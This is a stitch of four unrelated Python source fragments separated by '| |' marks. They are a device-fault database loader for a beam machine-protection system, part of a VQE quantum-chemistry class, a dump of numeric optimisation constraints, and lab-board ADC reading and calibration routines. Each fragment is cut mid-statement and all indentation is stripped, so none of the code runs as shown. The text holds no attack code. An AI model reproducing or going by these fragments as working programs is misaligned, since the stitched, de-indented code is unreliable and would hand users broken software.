# print 'Adding fault state for {0} (fault_id={1}, device_state_id={2}'.\
# format(device_info['device'], device_fault.id, device_states[m].id)
fault_state = models.FaultState(device_state=device_states[m], fault=device_fault)
self.session.add(fault_state)
self.session.commit()
self.session.refresh(fault_state)
# Add the AllowedClasses for each fault state (there may be multiple per FaultState)
for d in self.beam_destinations:
power_class_str = mitigation[device_info['mitigation']][device_states[m].name][d.lower()]
if (power_class_str != '-'):
beam_class = self.session.query(models.BeamClass).\
filter(models.BeamClass.id==int(power_class_str)).one()
beam_destination = self.session.query(models.BeamDestination).\
filter(models.BeamDestination.name==d).one()
fault_state.add_allowed_class(beam_class=beam_class, beam_destination=beam_destination)
else: # if fault=='all'
mit_location = device_info['mitigation']
for fault in faults:
fault_name = faults[fault]['name']
fault_desc = device_info['fault_name']
device_fault = models.Fault(name=fault_name,description=fault_desc)
self.session.add(device_fault)
self.session.commit()
self.session.refresh(device_fault)
device_fault_input = models.FaultInput(bit_position=0, device=device, fault=device_fault)
self.session.add(device_fault_input)
self.session.commit()
self.session.refresh(device_fault_input)
for fs in faults[fault]['states']:
fault_state = models.FaultState(device_state=device_states[fs], fault=device_fault)
self.session.add(fault_state)
self.session.commit()
self.session.refresh(fault_state)
for d in self.beam_destinations:
power_class_str = mitigation[mit_location][fs][d.lower()]
if (power_class_str != '-'):
beam_class = self.session.query(models.BeamClass).\
filter(models.BeamClass.id==int(power_class_str)).one()
beam_destination = self.session.query(models.BeamDestination).\
filter(models.BeamDestination.name==d).one()
fault_state.add_allowed_class(beam_class=beam_class, beam_destination=beam_destination)
self.session.commit()
f.close()
def is_lcls1_ln(self, app_card):
try:
app_crate = self.session.query(models.Crate).\
filter(models.Crate.id==app_card.crate_id).one()
except:
return False
slots = []
for n in app_crate.link_nodes:
slots.append(n.slot_number)
for ln in app_crate.link_nodes:
if (app_card.slot_number == ln.slot_number or
(ln.slot_number == 2 and not app_card.slot_number in slots)):
link_node = ln
if (link_node.ln_type == 3 or link_node.ln_type == 1):
return True
else:
return False
#(venv)[lpiccoli@lcls-dev3 PROF]$ ll
#
# DeviceStates.csv
# DeviceType.csv
# Devices.csv
# DigitalChannels.csv
# Mitigation.csv
def add_digital_device(self, directory, card_name="Digital Card"):
print(('Adding ' + directory))
# Virtual Card means it is a Digital Card, but signals must be
# mapped to inputs 32 to 47 (lower 32 inputs are digital inputs
# for external HW)
is_virtual = False
if (card_name == 'Virtual Card'):
is_virtual = True
card_name = 'Digital Card'
# Find the device type
file_name = directory + '/DeviceType.csv'
[device_type, evaluation_string, measured_device_type_id] = self.check_device_type(file_name)
if device_type == None:
return
# Add DeviceStates
file_name = directory + '/DeviceStates.csv'
[faults, device_states] = self.add_device_states(file_name, device_type, False)
# Add DigitalChannels, first read the channels for one device
file_name = directory + '/DigitalChannels.csv'
soft = False
try:
f = open(file_name)
except:
file_name = directory + '/SoftChannels.csv'
soft=True
if soft:
try:
f = open(file_name)
except:
print(('ERROR: No file found ({0})'.format(file_name)))
return
line = f.readline().strip()
fields=[]
for field in line.split(','):
fields.append(str(field).lower())
channel={}
while line:
channel_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
channel_info[fields[field_index]]=property
field_index = field_index + 1
channel[channel_info['name']]=channel_info
# for key in channel:
# print 'Key: {3}, Name: {0}, ZeroName: {1}, OneName: {2}, MPS Ch: {4}'.\
# format(channel[key]['name'], channel[key]['z_name'],
# channel[key]['o_name'], key, channel[key]['mps_channel_#'])
f.close()
# Read Mitigation list
file_name = directory + '/Mitigation.csv'
mitigation = self.read_mitigation(file_name)
# Read Ignore conditions (if any)
file_name = directory + '/Conditions.csv'
conditions = None
if (os.path.isfile(file_name)):
conditions = self.read_conditions(file_name)
# Read list of devices, create Faults, FaultStates, etc...
file_name = directory + '/Devices.csv'
f = open(file_name)
line = f.readline().strip()
fields=[]
has_measured_device=False
for field in line.split(','):
lower_case_field = str(field).lower()
fields.append(lower_case_field)
if lower_case_field == 'measured_device_type_id':
has_measured_device=True
# read every device
while line:
device_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
device_info[fields[field_index]]=property
#print fields[field_index] + ' ' + device_info[fields[field_index]]
field_index = field_index + 1
add_device = True
try:
app_card = self.session.query(models.ApplicationCard).\
filter(models.ApplicationCard.id==int(device_info['application_card_number'])).one()
if app_card.name != card_name:
print(('ERROR: digital device ({0}) assigned to non-digital card ({1} at {2} slot {3})'.\
format(device_info['device'], app_card.name, app_card.crate.location, app_card.slot_number)))
return
except:
app_card = None
if (self.lcls1_only):
print(('WARN: Cannot find app_card with number {0}, LCLS-I option active.'.\
format(device_info['application_card_number'])))
continue
# print('ERROR: Cannot find application_card with id {0}, exiting...'.
# return
# If LCLS-I only option is enabled, only add device if it belongs to an LCLS-I
# reporting crate
if (self.lcls1_only and not self.is_lcls1_ln(app_card)):
continue
measured_device = measured_device_type_id
if has_measured_device:
if device_info['measured_device_type_id'] != '-':
measured_device=device_info['measured_device_type_id']
evaluation = 0
if device_info['mitigation'] == '-':
evaluation = 3 # this means the device | |
<filename>qucochemistry/vqe.py
from typing import List, Union
from pyquil.api import QuantumComputer, WavefunctionSimulator
from pyquil.simulation import NumpyWavefunctionSimulator
from pyquil.quil import Program
from pyquil.gates import RESET
from pyquil.paulis import PauliSum, PauliTerm, ID
from pyquil.operator_estimation import group_experiments, TensorProductState
from pyquil.experiment import Experiment, ExperimentSetting, \
correct_experiment_result
from openfermion.hamiltonians import MolecularData
from openfermion.utils import uccsd_singlet_generator, normal_ordered, \
uccsd_singlet_get_packed_amplitudes, \
expectation, jw_hartree_fock_state
from openfermion.transforms import jordan_wigner, get_sparse_operator, \
get_fermion_operator
from scipy.sparse.linalg import expm_multiply
import numpy as np
import scipy as sp
import time
from qucochemistry.utils import qubitop_to_pyquilpauli, \
pyquilpauli_to_qubitop
from qucochemistry.circuits import ref_state_preparation_circuit, \
uccsd_ansatz_circuit, uccsd_ansatz_circuit_parametric
from qucochemistry.utils import minimizer
class VQEexperiment:
def __init__(self, qc: Union[QuantumComputer, None] = None,
hamiltonian: Union[PauliSum, List[PauliTerm], None] = None,
molecule: MolecularData = None,
method: str = 'Numpy',
strategy: str = 'UCCSD',
optimizer: str = 'BFGS',
maxiter: int = 100000,
shotN: int = 10000,
active_reset: bool = True,
tomography: bool = False,
verbose: bool = False,
parametric: bool = False,
custom_qubits = None):
"""
VQE experiment class.
Initialize an instance of this class to prepare a VQE experiment.
One may instantiate this class either based on
an OpenFermion MolecularData object
(containing a chemistry problem Hamiltonian)
or manually suggest a Hamiltonian.
The VQE can run circuits on different virtual or real backends:
currently, we support the Rigetti QPU backend, locally running QVM,
a WavefunctionSimulator, a NumpyWavefunctionSimulator.
Alternatively, one may run the VQE ansatz unitary directly
(not decomposed as a circuit)
via direct exponentiation of the unitary ansatz,
with the 'linalg' method.
The different backends do not all support parametric gates (yet),
and the user can specify whether or not to use it.
Currently, we support two built-in ansatz strategies
and the option of setting your own ansatz circuit.
The built-in UCCSD and HF strategies are based on data
from MolecularData object and thus require one.
For finding the groundstate of a custom Hamiltonian,
it is required to manually set an ansatz strategy.
Currently, the only classical optimizer for the VQE
is the scipy.optimize.minimize module.
This may be straightforwardly extended in future releases,
contributions are welcome.
This class can be initialized with any algorithm in the scipy class,
and the max number of iterations can be specified.
For some QuantumComputer objects,
the qubit lattice is not numbered 0..N-1
but has architecture-specific logical labels.
These need to be manually read from the lattice topology
and specified in the list custom_qubits.
On the physical hardware QPU,
actively resetting the qubits is supported
to speed up the repetition time of VQE.
To debug and during development, set verbose=True
to print output details to the console.
:param [QuantumComputer(),None] qc: object
:param [PauliSum, list(PauliTerm)] hamiltonian:
Hamiltonian which one would like to simulate
:param MolecularData molecule: OpenFermion Molecule data object.
If this is given, the VQE module assumes a
chemistry experiment using OpenFermion
:param str method: string describing the Backend solver method.
current options: {Numpy, WFS, linalg, QC}
:param str strategy: string describing circuit VQE strategy.
current options: {UCCSD, HF, custom_program}
:param str optimizer: classical optimization algorithm,
choose from scipy.optimize.minimize options
:param int maxiter: max number of iterations
:param int shotN: number of shots in the Tomography experiments
:param bool active_reset: whether or not to actively reset the qubits
:param bool tomography: set to False for access to full wavefunction,
set to True for just sampling from it
:param bool verbose: set to True for verbose output to the console,
for all methods in this class
:param bool parametric: set to True to use parametric gate compilation,
False to compile a new circuit for every iteration
:param list() custom_qubits: list of qubits, i.e. [7,0,1,2] ordering
the qubit IDs as they appear on the QPU
lattice of the QuantumComputer() object.
"""
if isinstance(hamiltonian, PauliSum):
if molecule is not None:
raise TypeError('Please supply either a Hamiltonian object'
' or a Molecule object, but not both.')
# Hamiltonian as a PauliSum, extracted to give a list instead
self.pauli_list = hamiltonian.terms
self.n_qubits = self.get_qubit_req()
# assumes 0-(N-1) ordering and every pauli index is in use
elif isinstance(hamiltonian, List):
if molecule is not None:
raise TypeError('Please supply either a Hamiltonian object'
' or a Molecule object, but not both.')
if len(hamiltonian) > 0:
if all([isinstance(term, PauliTerm) for term in hamiltonian]):
self.pauli_list = hamiltonian
self.n_qubits = self.get_qubit_req()
else:
raise TypeError('Hamiltonian as a list must '
'contain only PauliTerm objects')
else:
print('Warning, empty hamiltonian passed, '
'assuming identity Hamiltonian = 1')
self.pauli_list = [ID()]
# this is allowed in principle,
# but won't make a lot of sense to use.
elif hamiltonian is None:
if molecule is None:
raise TypeError('either feed a MolecularData object '
'or a PyQuil Hamiltonian to this class')
else:
self.H = normal_ordered(get_fermion_operator(
molecule.get_molecular_hamiltonian()))
# store Fermionic
# Hamiltonian in FermionOperator() instance
self.qubitop = jordan_wigner(self.H)
# Apply jordan_wigner transformation and store
self.n_qubits = 2 * molecule.n_orbitals
self.pauli_list = qubitop_to_pyquilpauli(self.qubitop).terms
else:
raise TypeError('hamiltonian must be a PauliSum '
'or list of PauliTerms')
# abstract QC. can refer to a qvm or qpu.
# QC architecture and available gates decide the compilation of the
# programs!
if isinstance(qc, QuantumComputer):
self.qc = qc
elif qc is None:
self.qc = None
else:
raise TypeError('qc must be a QuantumComputer object.'
' If you do not use a QC backend, omit, or supply '
'qc=None')
# number of shots in a tomography experiment
if isinstance(shotN, int):
self.shotN = shotN
elif isinstance(shotN, float):
self.shotN = int(shotN)
else:
raise TypeError('shotN must be an integer or float')
print(f"shots = {self.shotN}")
# simulation method. Choose from
methodoptions = ['WFS', 'linalg', 'QC', 'Numpy']
if method in methodoptions:
self.method = method
else:
raise ValueError('choose a method from the following list: '\
+ str(methodoptions) +
'. If a QPU, QVM is passed to qc, select QC.')
# circuit strategy. choose from UCCSD, HF, custom_program
strategyoptions = ['UCCSD', 'HF', 'custom_program']
if strategy in strategyoptions:
if (strategy in ['UCCSD', 'HF']) and molecule is None:
raise ValueError('Strategy selected, UCCSD or HF, '
'requires a MolecularData object from PySCF as input.')
self.strategy = strategy
else:
raise ValueError('choose a circuit strategy from the'
' following list: ' + str(strategyoptions))
# classical optimizer
classical_options = ['Nelder-Mead', 'Powell', 'CG', 'BFGS',
'Newton-CG', 'L-BFGS-B ', 'TNC', 'COBYLA',
'SLSQP', 'trust-constr', 'dogleg', 'trust-ncg',
'trust-exact', 'trust-krylov']
if optimizer not in classical_options:
raise ValueError('choose a classical optimizer from'
' the following list: ' + str(classical_options))
else:
self.optimizer = optimizer
# store the optimizer historical values
self.history = []
# chemistry files. must be properly formatted
# in order to use a UCCSD ansatz (see MolecularData)
self.molecule = molecule
# whether or not the qubits should be actively reset.
# False will make the hardware wait for 3 coherence lengths
# to go back to |0>
self.active_reset = active_reset
# max number of iterations for the classical optimizer
self.maxiter = maxiter
# vqe results, stores output of scipy.optimize.minimize,
# a OptimizeResult object. initialize to None
self.res = None
# list of grouped experiments (only relevant to tomography)
self.experiment_list = None
# whether to print debugging data to console
self.verbose = verbose
# real QPU has a custom qubit labeling
self.custom_qubits = custom_qubits
# i'th function call
self.it_num = 0
# whether to perform parametric method
self.parametric_way = parametric
# whether to do tomography or just calculate the wavefunction
self.tomography = tomography
# set empty circuit unitary.
# This is used for the direct linear algebraic methods.
self.circuit_unitary = None
if strategy not in ['UCCSD', 'HF', 'custom_program']:
raise ValueError('please select a strategy from UCCSD,'
' HF, custom_program or modify this class with your '
'own options')
if strategy == 'UCCSD':
# load UCCSD initial amps from the CCSD amps
# in the MolecularData() object
amps = uccsd_singlet_get_packed_amplitudes(
self.molecule.ccsd_single_amps,
self.molecule.ccsd_double_amps,
n_qubits=self.molecule.n_orbitals * 2,
n_electrons=self.molecule.n_electrons)
self.initial_packed_amps = amps
else:
# allocate empty initial angles for the circuit. modify later.
self.initial_packed_amps = []
if (strategy == 'UCCSD') and (method != 'linalg'):
# UCCSD circuit strategy preparations
self.ref_state = ref_state_preparation_circuit(
molecule,
ref_type='HF',
cq=self.custom_qubits)
if self.parametric_way:
# in the parametric_way,
# the circuit is built with | |
53.66*m.x882 - 53.66*m.x889
- 7.24*m.x897 - 7.24*m.x916 - 7.24*m.x923 - 7.24*m.x934 - 13.32*m.x960 - 13.32*m.x971
- 48.04*m.x981 - 48.04*m.x998 - 48.04*m.x1014 - 42.08*m.x1023 - 42.08*m.x1030 - 42.08*m.x1040
- 42.08*m.x1052 - 55.03*m.x1148 - 60.06*m.x1202 <= 0)
m.c331 = Constraint(expr= - 16.47*m.x94 - 16.47*m.x108 - 16.47*m.x117 - 16.47*m.x136 - 11.64*m.x155 - 11.64*m.x173
- 11.64*m.x179 - 68.6*m.x188 - 68.6*m.x212 - 68.6*m.x226 - 68.6*m.x237 - 64.76*m.x263
- 64.76*m.x270 - 64.76*m.x279 - 64.76*m.x286 - 64.76*m.x297 - 12.46*m.x307 - 12.46*m.x340
- 54.72*m.x349 - 54.72*m.x356 - 54.72*m.x372 - 54.72*m.x381 - 54.72*m.x388 - 54.72*m.x399
- 73.44*m.x409 - 73.44*m.x433 - 73.44*m.x441 - 73.44*m.x453 - 37.59*m.x463 - 37.59*m.x487
- 37.59*m.x505 - 37.59*m.x514 - 37.59*m.x526 - 30.21*m.x552 - 30.21*m.x569 - 30.21*m.x576
- 30.21*m.x587 - 6.13*m.x613 - 6.13*m.x622 - 6.13*m.x638 - 6.13*m.x647 - 6.13*m.x659
- 39.73*m.x669 - 39.73*m.x676 - 39.73*m.x685 - 39.73*m.x693 - 39.73*m.x705 - 75.46*m.x721
- 75.46*m.x730 - 75.46*m.x746 - 23.71*m.x755 - 23.71*m.x788 - 20.11*m.x797 - 20.11*m.x814
- 20.11*m.x831 - 20.11*m.x843 - 75.24*m.x855 - 10.89*m.x865 - 10.89*m.x882 - 10.89*m.x889
- 13.38*m.x897 - 13.38*m.x916 - 13.38*m.x923 - 13.38*m.x934 - 58.74*m.x960 - 58.74*m.x971
- 41.35*m.x981 - 41.35*m.x998 - 41.35*m.x1014 - 8.42*m.x1023 - 8.42*m.x1030 - 8.42*m.x1040
- 8.42*m.x1052 - 30.21*m.x1148 - 75.24*m.x1202 <= 0)
m.c332 = Constraint(expr= - 69.36*m.x94 - 69.36*m.x108 - 69.36*m.x117 - 69.36*m.x136 - 49.15*m.x155 - 49.15*m.x173
- 49.15*m.x179 - 43.95*m.x188 - 43.95*m.x212 - 43.95*m.x226 - 43.95*m.x237 - 44.71*m.x263
- 44.71*m.x270 - 44.71*m.x279 - 44.71*m.x286 - 44.71*m.x297 - 23.04*m.x307 - 23.04*m.x340
- 37.06*m.x349 - 37.06*m.x356 - 37.06*m.x372 - 37.06*m.x381 - 37.06*m.x388 - 37.06*m.x399
+ 7.66*m.x409 + 7.66*m.x433 + 7.66*m.x441 + 7.66*m.x453 - 2.94*m.x463 - 2.94*m.x487
- 2.94*m.x505 - 2.94*m.x514 - 2.94*m.x526 - 23.16*m.x552 - 23.16*m.x569 - 23.16*m.x576
- 23.16*m.x587 - 24.52*m.x613 - 24.52*m.x622 - 24.52*m.x638 - 24.52*m.x647 - 24.52*m.x659
+ 0.99*m.x669 + 0.99*m.x676 + 0.99*m.x685 + 0.99*m.x693 + 0.99*m.x705 - 48.55*m.x721
- 48.55*m.x730 - 48.55*m.x746 - 43.7*m.x755 - 43.7*m.x788 + 1.17*m.x797 + 1.17*m.x814
+ 1.17*m.x831 + 1.17*m.x843 - 35.83*m.x855 - 58.17*m.x865 - 58.17*m.x882 - 58.17*m.x889
+ 0.780000000000001*m.x897 + 0.780000000000001*m.x916 + 0.780000000000001*m.x923
+ 0.780000000000001*m.x934 + 5.66*m.x960 + 5.66*m.x971 - 50.66*m.x981 - 50.66*m.x998
- 50.66*m.x1014 - 30.42*m.x1023 - 30.42*m.x1030 - 30.42*m.x1040 - 30.42*m.x1052
- 23.16*m.x1148 - 35.83*m.x1202 <= 0)
m.c333 = Constraint(expr= 4.47*m.x94 + 4.47*m.x108 + 4.47*m.x117 + 4.47*m.x136 - 49.64*m.x155 - 49.64*m.x173
- 49.64*m.x179 - 53.98*m.x188 - 53.98*m.x212 - 53.98*m.x226 - 53.98*m.x237 + 2.52*m.x263
+ 2.52*m.x270 + 2.52*m.x279 + 2.52*m.x286 + 2.52*m.x297 - 20.19*m.x307 - 20.19*m.x340
- 44.3*m.x349 - 44.3*m.x356 - 44.3*m.x372 - 44.3*m.x381 - 44.3*m.x388 - 44.3*m.x399
- 32.87*m.x409 - 32.87*m.x433 - 32.87*m.x441 - 32.87*m.x453 - 43.86*m.x463 - 43.86*m.x487
- 43.86*m.x505 - 43.86*m.x514 - 43.86*m.x526 + 1.49*m.x552 + 1.49*m.x569 + 1.49*m.x576
+ 1.49*m.x587 - 61.18*m.x613 - 61.18*m.x622 - 61.18*m.x638 - 61.18*m.x647 - 61.18*m.x659
- 46.77*m.x669 - 46.77*m.x676 - 46.77*m.x685 - 46.77*m.x693 - 46.77*m.x705 - 13.22*m.x721
- 13.22*m.x730 - 13.22*m.x746 - 31.83*m.x755 - 31.83*m.x788 - 17.17*m.x797 - 17.17*m.x814
- 17.17*m.x831 - 17.17*m.x843 - 28.6*m.x855 - 26.17*m.x865 - 26.17*m.x882 - 26.17*m.x889
- 18.54*m.x897 - 18.54*m.x916 - 18.54*m.x923 - 18.54*m.x934 + 3.79*m.x960 + 3.79*m.x971
- 62.55*m.x981 - 62.55*m.x998 - 62.55*m.x1014 - 29.72*m.x1023 - 29.72*m.x1030 - 29.72*m.x1040
- 29.72*m.x1052 + 1.49*m.x1148 - 28.6*m.x1202 <= 0)
m.c334 = Constraint(expr= - 10.64*m.x94 - 10.64*m.x108 - 10.64*m.x117 - 10.64*m.x136 - 40.15*m.x155 - 40.15*m.x173
- 40.15*m.x179 - 22.94*m.x188 - 22.94*m.x212 - 22.94*m.x226 - 22.94*m.x237 - 60.64*m.x263
- 60.64*m.x270 - 60.64*m.x279 - 60.64*m.x286 - 60.64*m.x297 - 3.7*m.x307 - 3.7*m.x340
- 67.51*m.x349 - 67.51*m.x356 - 67.51*m.x372 - 67.51*m.x381 - 67.51*m.x388 - 67.51*m.x399
- 69.6*m.x409 - 69.6*m.x433 - 69.6*m.x441 - 69.6*m.x453 - 68.66*m.x463 - 68.66*m.x487
- 68.66*m.x505 - 68.66*m.x514 - 68.66*m.x526 + 4.77*m.x552 + 4.77*m.x569 + 4.77*m.x576
+ 4.77*m.x587 - 42.8*m.x613 - 42.8*m.x622 - 42.8*m.x638 - 42.8*m.x647 - 42.8*m.x659
- 69.81*m.x669 - 69.81*m.x676 - 69.81*m.x685 - 69.81*m.x693 - 69.81*m.x705 - 55.51*m.x721
- 55.51*m.x730 - 55.51*m.x746 - 14.66*m.x755 - 14.66*m.x788 - 4.47*m.x797 - 4.47*m.x814
- 4.47*m.x831 - 4.47*m.x843 - 58.16*m.x855 - 35.97*m.x865 - 35.97*m.x882 - 35.97*m.x889
- 12.35*m.x897 - 12.35*m.x916 - 12.35*m.x923 - 12.35*m.x934 - 65.88*m.x960 - 65.88*m.x971
- 50.25*m.x981 - 50.25*m.x998 - 50.25*m.x1014 - 57.21*m.x1023 - 57.21*m.x1030 - 57.21*m.x1040
- 57.21*m.x1052 + 4.77*m.x1148 - 58.16*m.x1202 <= 0)
m.c335 = Constraint(expr= 37.49*m.x109 + 37.49*m.x126 + 37.49*m.x137 + 37.07*m.x147 + 37.07*m.x156 + 37.07*m.x166
+ 37.07*m.x174 + 37.07*m.x180 + 31.65*m.x197 + 31.65*m.x221 + 31.65*m.x227 + 31.65*m.x238
+ 3.93*m.x248 + 3.93*m.x271 + 3.93*m.x280 + 3.93*m.x287 + 3.93*m.x298
+ 0.189999999999998*m.x316 + 0.189999999999998*m.x333 + 0.189999999999998*m.x341
- 12.04*m.x365 - 12.04*m.x373 - 12.04*m.x382 - 12.04*m.x389 - 12.04*m.x400 + 39.01*m.x418
+ 39.01*m.x442 + 39.01*m.x454 - 8.42*m.x472 - 8.42*m.x488 - 8.42*m.x498 - 8.42*m.x506
- 8.42*m.x515 - 8.42*m.x527 + 26.15*m.x537 + 26.15*m.x561 + 26.15*m.x570 + 26.15*m.x577
+ 26.15*m.x588 - 12.85*m.x598 - 12.85*m.x614 - 12.85*m.x631 - 12.85*m.x639 - 12.85*m.x648
- 12.85*m.x660 + 17.42*m.x677 + 17.42*m.x694 + 17.42*m.x706 - 16.81*m.x722 - 16.81*m.x739
- 16.81*m.x747 - 27.55*m.x764 - 27.55*m.x781 - 27.55*m.x789 - 15.01*m.x806 - 15.01*m.x823
- 15.01*m.x832 - 15.01*m.x844 - 25.24*m.x856 + 6.73*m.x874 + 6.73*m.x883 + 6.73*m.x890
- 33.73*m.x898 - 33.73*m.x908 - 33.73*m.x917 - 33.73*m.x924 - 33.73*m.x935 + 18.64*m.x945
+ 18.64*m.x955 + 18.64*m.x961 + 18.64*m.x972 + 31.96*m.x990 + 31.96*m.x999 + 31.96*m.x1009
+ 31.96*m.x1015 + 36.08*m.x1031 + 36.08*m.x1041 + 36.08*m.x1053 + 37.49*m.x1065
- 12.04*m.x1115 + 39.01*m.x1126 - 16.81*m.x1179 - 25.24*m.x1203 - 33.73*m.x1219
+ 36.08*m.x1246 <= 0)
m.c336 = Constraint(expr= - 90.76*m.x109 - 90.76*m.x126 - 90.76*m.x137 - 51.74*m.x147 - 51.74*m.x156 - 51.74*m.x166
- 51.74*m.x174 - 51.74*m.x180 - 45.83*m.x197 - 45.83*m.x221 - 45.83*m.x227 - 45.83*m.x238
- 36.81*m.x248 - 36.81*m.x271 - 36.81*m.x280 - 36.81*m.x287 - 36.81*m.x298 - 28.25*m.x316
- 28.25*m.x333 - 28.25*m.x341 - 44.08*m.x365 - 44.08*m.x373 - 44.08*m.x382 - 44.08*m.x389
- 44.08*m.x400 - 55.7*m.x418 - 55.7*m.x442 - 55.7*m.x454 - 77.86*m.x472 - 77.86*m.x488
- 77.86*m.x498 - 77.86*m.x506 - 77.86*m.x515 - 77.86*m.x527 - 71.11*m.x537 - 71.11*m.x561
- 71.11*m.x570 - 71.11*m.x577 - 71.11*m.x588 - 94.46*m.x598 - 94.46*m.x614 - 94.46*m.x631
- 94.46*m.x639 - 94.46*m.x648 - 94.46*m.x660 - 84.92*m.x677 - 84.92*m.x694 - 84.92*m.x706
- 74.64*m.x722 - 74.64*m.x739 - 74.64*m.x747 - 61.57*m.x764 - 61.57*m.x781 - 61.57*m.x789
- 31.58*m.x806 - 31.58*m.x823 - 31.58*m.x832 - 31.58*m.x844 - 31.87*m.x856 - 35.59*m.x874
- 35.59*m.x883 - 35.59*m.x890 - 30.4*m.x898 - 30.4*m.x908 - 30.4*m.x917 - 30.4*m.x924
- 30.4*m.x935 - 81.44*m.x945 - 81.44*m.x955 - 81.44*m.x961 - 81.44*m.x972 - 48.38*m.x990
- 48.38*m.x999 - 48.38*m.x1009 - 48.38*m.x1015 - 80.62*m.x1031 - 80.62*m.x1041 - 80.62*m.x1053
- 90.76*m.x1065 - 44.08*m.x1115 - 55.7*m.x1126 - 74.64*m.x1179 - 31.87*m.x1203 - 30.4*m.x1219
- 80.62*m.x1246 <= 0)
m.c337 = Constraint(expr= 2.85*m.x109 + 2.85*m.x126 + 2.85*m.x137 + 1.6*m.x147 + 1.6*m.x156 + 1.6*m.x166 + 1.6*m.x174
+ 1.6*m.x180 - 10.51*m.x197 - 10.51*m.x221 - 10.51*m.x227 - 10.51*m.x238 + 44.28*m.x248
+ 44.28*m.x271 + 44.28*m.x280 + 44.28*m.x287 + 44.28*m.x298 - 3.45*m.x316 - 3.45*m.x333
- 3.45*m.x341 - 11.75*m.x365 - 11.75*m.x373 - 11.75*m.x382 - 11.75*m.x389 - 11.75*m.x400
+ 45.9*m.x418 + 45.9*m.x442 + 45.9*m.x454 + 24.77*m.x472 + 24.77*m.x488 + 24.77*m.x498
+ 24.77*m.x506 + 24.77*m.x515 + 24.77*m.x527 + 2.32*m.x537 + 2.32*m.x561 + 2.32*m.x570
+ 2.32*m.x577 + 2.32*m.x588 - 20.48*m.x598 - 20.48*m.x614 - 20.48*m.x631 - 20.48*m.x639
- 20.48*m.x648 - 20.48*m.x660 + 8.6*m.x677 + 8.6*m.x694 + 8.6*m.x706 + 34.32*m.x722
+ 34.32*m.x739 + 34.32*m.x747 + 32.91*m.x764 + 32.91*m.x781 + 32.91*m.x789 + 43.64*m.x806
+ 43.64*m.x823 + 43.64*m.x832 + 43.64*m.x844 - 9.1*m.x856 + 12.58*m.x874 + 12.58*m.x883
+ 12.58*m.x890 - 2.39*m.x898 - 2.39*m.x908 - 2.39*m.x917 - 2.39*m.x924 - 2.39*m.x935
- 25.35*m.x945 - 25.35*m.x955 - 25.35*m.x961 - 25.35*m.x972 - 24.93*m.x990 - 24.93*m.x999
- 24.93*m.x1009 - 24.93*m.x1015 - 3.36*m.x1031 - 3.36*m.x1041 - 3.36*m.x1053 + 2.85*m.x1065
- 11.75*m.x1115 + 45.9*m.x1126 + 34.32*m.x1179 - 9.1*m.x1203 - 2.39*m.x1219 - 3.36*m.x1246
<= 0)
m.c338 = Constraint(expr= - 20.86*m.x109 - 20.86*m.x126 - 20.86*m.x137 - 72.78*m.x147 - 72.78*m.x156 - 72.78*m.x166
- 72.78*m.x174 - 72.78*m.x180 - 35.56*m.x197 - 35.56*m.x221 - 35.56*m.x227 - 35.56*m.x238
- 63.68*m.x248 - 63.68*m.x271 - 63.68*m.x280 - 63.68*m.x287 - 63.68*m.x298 - 53.39*m.x316
- 53.39*m.x333 - 53.39*m.x341 - 19.6*m.x365 - 19.6*m.x373 - 19.6*m.x382 - 19.6*m.x389
- 19.6*m.x400 - 71.48*m.x418 - 71.48*m.x442 - 71.48*m.x454 - 20.3*m.x472 - 20.3*m.x488
- 20.3*m.x498 - 20.3*m.x506 - 20.3*m.x515 - 20.3*m.x527 - 38.09*m.x537 - 38.09*m.x561
- 38.09*m.x570 - 38.09*m.x577 - 38.09*m.x588 - 16.84*m.x598 - 16.84*m.x614 - 16.84*m.x631
- 16.84*m.x639 - 16.84*m.x648 - 16.84*m.x660 - 65.85*m.x677 - 65.85*m.x694 - 65.85*m.x706
- 84.1*m.x722 - 84.1*m.x739 - 84.1*m.x747 - 17.46*m.x764 - 17.46*m.x781 - 17.46*m.x789
| |
== 0:
nvalue = 0.0
else:
nvalue = vref*readADC(ch2)
return pvalue - nvalue
'''
@rCurrent@
rCurrent(r,ch1,ch2)
Reads the voltage on a resistor and computes current from it
If any channel is zero, it is considered as GND
Parameters:
r : Resistor value
n1 : Positive terminal ADC
n2 : Negative terminal ADC
If omited it is considered to be GND
Returns the resistor current
Included in slab.py
'''
def rCurrent(r,ch1,ch2=0):
v = readVoltage(ch1,ch2)
i = v/r
return i
'''
@setDCreadings@
setDCreadings(number)
Sets the number of readings to average on each DC mesurement
Parameter:
number : Number of values to read
Returns last value of this number
Included in slab.py
'''
def setDCreadings(number):
global dcroundings
lastValue = dcroundings
# Check
if number < 1:
raise SlabEx("Number of readings must be greater or equal than 1")
if number > 65535:
raise SlabEx("Number of readings too big")
dcroundings = int(number)
# Send command
startCommand('N')
sendU16(dcroundings)
sendCRC()
checkACK()
checkCRC()
return lastValue
'''
@adcCalibrate@
adcCalibrate()
Second stage of board calibration
Calibrates ADCs against DAC1
Stores calibration data on ADC_CAL_FILE file
Returns nothing
Included in slab.py
'''
def adcCalibrate():
global xcal,ycal1,ycal2,ycal3,ycal4,adcCalData
print()
print("Calibration of ADCs")
print()
print("Connect the DAC 1 output to all ADC inputs")
print("Use the buffers in all connections")
print()
input("Press [Return] to continue")
# Increase number of readings for better calibration
lastDCR=setDCreadings(1000)
# Define input calibration range and steps
# xcal = np.arange(0.0,1.1,0.1)
xcal = []
for x in range(0,11):
xcal.append(x/10.0)
# Output range is now empty
ycal1 = []
ycal2 = []
ycal3 = []
ycal4 = []
# Obtain calibration data
# We use readChannel because it does not depend on
# previous calibrations
message(1,"Performing ADC calibration")
for x in xcal:
message(2," Calibrate at " + str(x))
writeDAC(1,x) # Set DAC value
time.sleep(0.1) # Wait a little
a1 = readChannel(1) # ADC read
a2 = readChannel(2)
a3 = readChannel(3)
a4 = readChannel(4)
ycal1.append(a1) # Append values
ycal2.append(a2)
ycal3.append(a3)
ycal4.append(a4)
prev1=-1;
# Check monotony
for x,y1,y2,y3,y4 in zip(xcal,ycal1,ycal2,ycal3,ycal4):
if prev1!=-1:
if y1 < prev1:
raise SlabEx("Channel 1 non monotonous")
if y2 < prev2:
raise SlabEx("Channel 2 non monotonous")
if y3 < prev3:
raise SlabEx("Channel 3 non monotonous")
if y4 < prev4:
raise SlabEx("Channel 4 non monotonous")
prev1 = y1
prev2 = y2
prev3 = y3
prev4 = y4
# Show graph is we have SciPy
if not scipy:
cannotPlot()
else:
plt.figure(facecolor="white") # White border
pl.plot(xcal,ycal1,label="ADC1") # Show curves
pl.plot(xcal,ycal2,label="ADC2")
